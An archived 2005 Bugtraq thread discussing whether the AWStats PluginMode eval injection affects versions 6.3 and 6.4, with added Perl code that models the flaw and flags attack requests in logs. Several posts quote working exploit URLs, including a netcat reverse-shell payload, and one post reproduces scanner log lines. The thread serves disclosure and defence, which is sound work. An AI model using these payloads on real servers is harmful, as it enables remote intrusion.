View Full Version : RE: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
William Pratt
16/02/05, 02:35
Same thing here on both 6.3 and 6.4. I am unable to reproduce this.
Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
William Pratt
Sr. Engineering Application Developer
Megapath Networks, Inc.
Http://www.MegaPath.net
I wish there was a knob on the TV to turn up the intelligence. There's a knob called "brightness", but it doesn't seem to work.

-- Gallagher
-----Original Message-----
From: Jamie Pratt [mailto:jpratt@norwich.edu]
Sent: Tuesday, February 15, 2005 11:26 AM
To: Ondra Holecek
Cc: bugtraq@securityfocus.com
Subject: Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
So what are the conditions of this bug/vuln? I can't reproduce this on several 6.3 installs..:
awstats 6.3 from source:
request:
http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;
output:
****************
Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
***************
regards,
jamie
Ondra Holecek wrote:
>
>
> GHC@www.securityfocus.com wrote:
> |
> | /*==========================================*/
> | // GHC -> AWStats <- ADVISORY
> | \\ PRODUCT: AWStats
> | // VERSION: <= 6.3
> | \\ URL: http://awstats.sourceforge.net/
> | // VULNERABILITY CLASS: Multiple vulnerabilities
> | \\ RISK: high
> | /*==========================================*/
>
> [...]
>
> |
> | PluginMode=:print+getpwent
> |
> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
> | This will satisfy eval() requirements, and :print getpwent() is
> executed.
> |
> |
> http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
> |
> | Sanitizing limits user's input, but there is no filtration for call
> symbols '()'.
>
> no, user is not limited, he can execute ANY command if he adds ; at the
> end of the command, try this
>
> awstats.pl?&PluginMode=:print+system('id')+;
>
> or even this
>
> awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
>
>
> Ondra
--
James Pratt
Unix Systems Administrator
Norwich University
http://www.norwich.edu/it
<jpratt@norwich.edu> | ph. (802)485-2532
twebster@daksoft.com
16/02/05, 05:15
You may need to specify an awstats config to view
example:
http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&PluginMode=:print+system('id')+;
Tony
Jamie Pratt <jpratt@norwich.edu> wrote on 02/15/2005 12:25:43 PM:
> So what are the conditions of this bug/vuln? I can't reproduce this on
> several 6.3 installs..:
>
> awstats 6.3 from source:
>
> request:
>
> http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;
>
> output:
> ****************
> Error: Can't locate object method "BuildFullHTMLOutput_print" via
> package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)
> line 1.
>
> Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
> permissions) may be wrong.
> Check config file, permissions and AWStats documentation (in 'docs'
> directory).
> ***************
>
> regards,
> jamie
>
> Ondra Holecek wrote:
> >
> >
> > GHC@www.securityfocus.com wrote:
> > |
> > | /*==========================================*/
> > | // GHC -> AWStats <- ADVISORY
> > | \\ PRODUCT: AWStats
> > | // VERSION: <= 6.3
> > | \\ URL: http://awstats.sourceforge.net/
> > | // VULNERABILITY CLASS: Multiple vulnerabilities
> > | \\ RISK: high
> > | /*==========================================*/
> >
> > [...]
> >
> > |
> > | PluginMode=:print+getpwent
> > |
> > | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
> > | This will satisfy eval() requirements, and :print getpwent() is
> > executed.
> > |
> > |
> > http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
> >
> > |
> > | Sanitizing limits user's input, but there is no filtration for call
> > symbols '()'.
> >
> > no, user is not limited, he can execute ANY command if he adds ; at the
> > end of the command, try this
> >
> > awstats.pl?&PluginMode=:print+system('id')+;
> >
> > or even this
> >
> > awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
> >
> >
> > Ondra
>
> --
>
> James Pratt
> Unix Systems Administrator
> Norwich University
> http://www.norwich.edu/it
> <jpratt@norwich.edu> | ph. (802)485-2532
K-OTiK Security
16/02/05, 20:55
In-Reply-To: <42126DAD.7090704@norwich.edu>
6.4 was released on 2005-02-14 13:13
Fixes:
- Fix security hole that allowed a user to read log file content even
when plugin rawlog was not enabled.
- Fix a possible use of AWStats for a DoS attack.
- configdir option was broken on windows servers.
- Minor fixes
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com/english
>Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
>error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
>rather not upgrade to a dev/unstable release for no reason...
>
>regards,
>jamie
Micah Brandon
17/02/05, 01:15
I'm going to have to disagree. Execution of Perl functions
is still possible in 6.3. You just have to jimmy it a little and
try/guess different plugins that may be installed. I got a hit
with 'hostinfo'. Try this on your server:
http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
Unix time shows up just below 'Whois command failed' error message.
That's game over in my book.
* Jamie Pratt (jpratt@norwich.edu) [050216 01:19]:
> Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
> error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
> rather not upgrade to a dev/unstable release for no reason...
>
> regards,
> jamie
>
> Herman Sheremetyev wrote:
> >It works on mine too, though I still have 6.1. I think you may need to
> >add the config=www.example.com into the url between the '?' and the '&'
> >for it to work properly though. On my linux boxes with apache 2.0 it
> >displays the command output in the page but on openbsd with apache 1.3
> >it gives a 500 Server Error because the output ends up in the headers
> >somehow. Either way it works though.
> >
> >-Herman
> >
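The mechanism the GHC advisory and Ondra describe earlier in the thread (user input concatenated into a sub name and then string-evaled, with a leading ':' turning the prefix into a label and a trailing ';' swallowing the appended '()'), together with Micah Brandon's observation that a known plugin name followed by a bare function name still gets executed, as an added example in Perl. This is not AWStats' own code: the dispatch routine, the three filters (none, strip, allowlist) and the leak_marker sub standing in for system('id') are assumptions made for this demonstration; the strip filter is only modelled on the "Can't locate object method ... via package systemid" error text quoted above, not on the real 6.3 source.

```perl
#!/usr/bin/perl
# Added example, not AWStats' own code: a reduced model of the PluginMode
# dispatch the advisory describes ("$function becomes
# 'BuildFullHTMLOutput_<PluginMode>', then eval()"), used to show how each
# payload shape in the thread behaves under three assumed input filters.
use strict;
use warnings;

# Stand-in for the side effect of system('id') or getpwent(): a counter we
# can inspect instead of running a real command.
our $marker = 0;
sub leak_marker { $marker++; return "leaked" }

# One "installed" plugin, standing in for the hostinfo plugin Micah Brandon
# guessed.  Real plugin output functions differ; this one echoes its args.
sub BuildFullHTMLOutput_hostinfo { return "hostinfo:@_" }

# Assumed filters.  None of them is the real 6.3/6.4 code.
my %filter = (
    none      => sub { $_[0] },                               # no sanitising
    strip     => sub { (my $m = $_[0]) =~ tr/:;()'//d; $m },  # drop a few metacharacters
    allowlist => sub { $_[0] =~ /^\w+$/ ? $_[0] : undef },    # plugin names are \w+ only
);

# Decode the CGI value, filter it, build the sub name and string-eval it.
sub dispatch {
    my ($filter_name, $plugin_mode) = @_;
    $marker = 0;
    $plugin_mode =~ tr/+/ /;                      # '+' is a space in a query string
    my $mode = $filter{$filter_name}->($plugin_mode);
    return { rejected => 1, marker => 0 } unless defined $mode;
    my $code   = "BuildFullHTMLOutput_$mode()";   # the pattern the advisory describes
    my $result = eval $code;
    return { code => $code, result => $result, error => $@, marker => $marker };
}

my @cases = (
    # [filter, PluginMode as sent in the URL, what the thread says about it]
    # In the thread the statement after the label is print system('id');
    # here it is leak_marker() so nothing is actually spawned.
    [ none      => ':leak_marker()+;',       'Ondra: label trick, ";" swallows the appended ()'   ],
    [ strip     => ":print+system('id')+;",  'Jamie/William: metacharacters stripped, eval dies'  ],
    [ strip     => 'hostinfo+leak_marker',   'Micah: known plugin + bareword call still executes' ],
    [ allowlist => ':leak_marker()+;',       'allowlist: rejected before eval'                    ],
    [ allowlist => 'hostinfo+leak_marker',   'allowlist: rejected before eval'                    ],
    [ allowlist => 'hostinfo',               'allowlist: legitimate plugin name, runs normally'   ],
);

for my $c (@cases) {
    my ($f, $mode, $note) = @$c;
    my $r = dispatch($f, $mode);
    printf "%-9s %-24s marker=%d %s\n", $f, $mode, $r->{marker},
        $r->{rejected} ? 'REJECTED'
      : $r->{error}    ? 'eval error: ' . (split /\n/, $r->{error})[0]
      :                  'ok, result=' . (defined $r->{result} ? $r->{result} : 'undef');
    print "          ($note)\n";
}
```

Two parse rules do the work: a bareword followed by ':' at the start of a statement is a label, so 'BuildFullHTMLOutput_:' is harmless and whatever follows is an ordinary statement; and when the first bareword is a sub Perl already knows (an installed plugin), 'BuildFullHTMLOutput_hostinfo leak_marker()' is a list-operator call whose argument is evaluated first, which is why stripping ':', ';' and '()' is not enough. Only the allowlist, which rejects the whole value before anything reaches eval, stops both shapes.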
Michael Scheidell
17/02/05, 23:45
And the skiddies who tried to exploit something that didn't exist on our
site:
(this goes on for some time, here is just a snip)
So, anyone out there who decided to do a 'wait and see', don't.
Disable awstats, use access rules, upgrade it or all three.
217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //awstatswwwroot/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl
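One way to pick requests like these out of an access log, as an added example that is not part of the post above: a small Perl filter, using only core Perl, that decodes the query string of each awstats.pl request and flags configdir values carrying shell metacharacters (the configdir=|cmd| shape in the scanner traffic) and PluginMode values that are not a bare plugin name (the eval shape discussed in this thread). The first sample line is copied from the excerpt above with its wrapping undone; the other two lines, the hosts in them and the status codes are constructed for the example.

```perl
#!/usr/bin/perl
# Added example, not part of the post: flag awstats.pl requests whose
# configdir or PluginMode value carries the metacharacters the two payload
# shapes in this thread rely on.  Reads Apache/NCSA access-log lines.
use strict;
use warnings;

# Sample input: line 1 is copied from the log excerpt above (re-joined);
# lines 2 and 3 are constructed for this example.
my @sample = (
    '217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '10.0.0.5 - - [16/Feb/2005:09:00:00 -0500] "GET /cgi-bin/awstats.pl?config=www.site.org&PluginMode=:print+system(%27id%27)+; HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [16/Feb/2005:09:00:05 -0500] "GET /cgi-bin/awstats.pl?config=www.site.org&output=main HTTP/1.1" 200 41234 "-" "Mozilla/5.0"',
);

# Minimal application/x-www-form-urlencoded decoding, so the rules below see
# the value the CGI script would see, not the escaped form.
sub url_decode {
    my $s = shift;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# Returns undef for lines that are not suspicious awstats.pl requests, else a
# hash with the client, timestamp, status and the reasons it was flagged.
sub classify {
    my $line = shift;
    my ($ip, $ts, $target, $status) =
        $line =~ /^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})/
        or return;                                   # not a parseable CLF line
    my ($path, $query) = split /\?/, $target, 2;
    return unless $path =~ /awstats\.pl$/ && defined $query;

    my %q;
    for my $pair (split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        $q{ url_decode($k) } = url_decode(defined $v ? $v : '');
    }

    my @why;
    # configdir=|cmd| : a pipe or other shell metacharacter in a path value
    push @why, "configdir=$q{configdir}"
        if defined $q{configdir} && $q{configdir} =~ /[|;`\$]/;
    # PluginMode should be a bare plugin name; anything else is headed for eval
    push @why, "PluginMode=$q{PluginMode}"
        if defined $q{PluginMode} && $q{PluginMode} !~ /^\w*$/;
    return unless @why;
    return { ip => $ip, time => $ts, status => $status, why => \@why };
}

my $hits = 0;
for my $line (@sample) {
    my $h = classify($line) or next;
    $hits++;
    # A 404 is still worth reporting: it is the scanner's fingerprint, and the
    # next path it tries may be one that exists.
    printf "%-16s %s status=%s  %s\n",
        $h->{ip}, $h->{time}, $h->{status}, join('; ', @{ $h->{why} });
}
print "$hits of ", scalar(@sample), " lines flagged\n";
```

Run against a real log with `perl flag.pl < access_log` after replacing @sample with a read loop on STDIN; the two rules are deliberately narrow (a value with a pipe or semicolon, or a PluginMode that is not \w+), so they produce few false positives on normal AWStats traffic, and the status code is kept in the output precisely because the 404s above are the signal that a host is being scanned.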
Matt Wilder
18/02/05, 00:35
Awstats version 5.6 is not susceptible to this as it does not have the
same plugin architecture. Could this be a >= 6.0 bug?
Matt
On Wed, 16 Feb 2005 15:52:00 -0500, Micah Brandon <brandon@vv.com> wrote:
>
>
> I'm going to have to disagree. Execution of Perl functions
> is still possible in 6.3. You just have to jimmy it a little and
> try/guess different plugins that may be installed. I got a hit
> with 'hostinfo'. Try this on your server:
>
> http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
>
> Unix time shows up just below 'Whois command failed' error message.
> That's game over in my book.
>
> * Jamie Pratt (jpratt@norwich.edu) [050216 01:19]:
> > Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
> > error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
> > rather not upgrade to a dev/unstable release for no reason...
> >
> > regards,
> > jamie
> >
> > Herman Sheremetyev wrote:
> > >It works on mine too, though I still have 6.1. I think you may need to
> > >add the config=www.example.com into the url between the '?' and the '&'
> > >for it to work properly though. On my linux boxes with apache 2.0 it
> > >displays the command output in the page but on openbsd with apache 1.3
> > >it gives a 500 Server Error because the output ends up in the headers
> > >somehow. Either way it works though.
> > >
> > >-Herman
> > >
>
>
newbug Tseng
19/02/05, 08:45
In-Reply-To: <eb743f98050217110164a4bcc8@mail.gmail.com>
Hi.
Please check http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
there is some code analysis for awstats.
>On Thu, 17 Feb 2005 14:01:33 -0500, Matt Wilder <grewaru@gmail.com> wrote (Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?):
>
>Awstats version 5.6 is not susceptible to this as it does not have the
>same plugin architecture. Could this be a >= 6.0 bug?
>
>Matt
>
>
>On Wed, 16 Feb 2005 15:52:00 -0500, Micah Brandon <brandon@vv.com> wrote:
>>
>>
>> I'm going to have to disagree. Execution of Perl functions
>> is still possible in 6.3. You just have to jimmy it a little and
>> try/guess different plugins that may be installed. I got a hit
>> with 'hostinfo'. Try this on your server:
>>
>> http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
>>
>> Unix time shows up just below 'Whois command failed' error message.
>> That's game over in my book.
>>
>> * Jamie Pratt (jpratt@norwich.edu) [050216 01:19]:
>> > Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
>> > error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
>> > rather not upgrade to a dev/unstable release for no reason...
>> >
>> > regards,
>> > jamie
>> >
>> > Herman Sheremetyev wrote:
>> > >It works on mine too, though I still have 6.1. I think you may need to
>> > >add the config=www.example.com into the url between the '?' and the '&'
>> > >for it to work properly though. On my linux boxes with apache 2.0 it
>> > >displays the command output in the page but on openbsd with apache 1.3
>> > >it gives a 500 Server Error because the output ends up in the headers
>> > >somehow. Either way it works though.
>> > >
>> > >-Herman
>> > >
>>
>>
>